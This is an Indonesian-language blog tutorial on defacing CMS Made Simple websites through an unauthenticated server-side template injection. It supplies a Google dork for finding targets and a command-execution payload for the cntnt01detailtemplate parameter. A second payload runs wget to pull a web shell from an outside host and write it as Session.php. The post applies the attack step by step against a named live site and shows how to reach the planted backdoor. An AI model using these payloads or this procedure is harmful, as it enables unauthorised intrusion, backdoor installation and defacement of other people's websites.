Cara Deface CMS Made Simple - Unauthenticated Served Side Template Injection


-

Hai sobat

Saya ikal,

Disini saya akan share sesuatu nih.

-


Sesuai judul kita kali ini, kita akan membahas sebuah exploit yang berada pada sebuah Content Management System bernama Made Simple.


Langsung saja kita masuk ke pembahasan.

Bahan : 

- Google Dork : "by CMS Made Simple" 2.1.6

- Shell Backdoor

- Exploit for check vulnerable : 

string:{php}echo system(%2527ls -la%2527);{/php}

- Exploit for upload shell backdoor : 

string:{php}echo system(%2527wget http://jakarta.bawaslu.go.id/Session.txt -O Session.php%2527);{/php}


Okeh pertama tama kita tentukan target untuk dieksekusi, target masih banyak kok itu di dork :D, jadi saya tidak mencantumkan live target diartikel ini.


Celahnya terdapat difile /index.php dengan parameter cntnt01detailtemplate, Clue tuh jika ingin mengembangkan dorknya :D.


Okeh saya anggap kita berdua sudah mempunyai target, dan sudah masuk ke halaman index. 



Lanjut, kalian scroll kebawah dan klik salah satu artikel yang ada.



Jangan tanya jika tampilan target saya dengan target kalian beda :D. 


Lanjut kalian cek url sitenya yah, contoh disini url site target saya seperti ini


http://www.fabconn.com/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=Simplex News Detail&cntnt01returnid=1


Nah, dibagian parameter cntnt01detailtemplate , kita hapus value nya, kira - kira seperti dibawah ini.


http://www.fabconn.com/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=&cntnt01returnid=1


Nah seperti itu yah, lanjut sekarang kalian salin exploit diatas dan taruh dibagian value parameter cntnt01detailtemplate atau sesudah bagian cntnt01detailtemplate=


http://www.fabconn.com/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:{php}echo system(%2527ls -la%2527);{/php}&cntnt01returnid=1



Nah berhasil kan :D. Tinggal kalian ganti exploit for check vulnerbale dengan exploit untuk upload shell backdoor.


http://www.fabconn.com/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:{php}echo system(%2527wget http://jakarta.bawaslu.go.id/Session.txt -O Session.php%2527);{/php}&cntnt01returnid=1


Lalu langsung akses saja shellnya di document root, seperti ini.


http://fabconn.com/Session.php?DragonXploiter=DragonXploiter


Nah segitu saja artikel kali ini, Kurang lebihnya biarkan saja :D. Karena saya fikir sudah cukup detail saya menyampaikannya :D.


Referensi : 

https://www.netsparker.com/web-applications-advisories/ns-17-032-server-side-template-injection-vulnerability-in-cms-made-simple/


Thanks

See U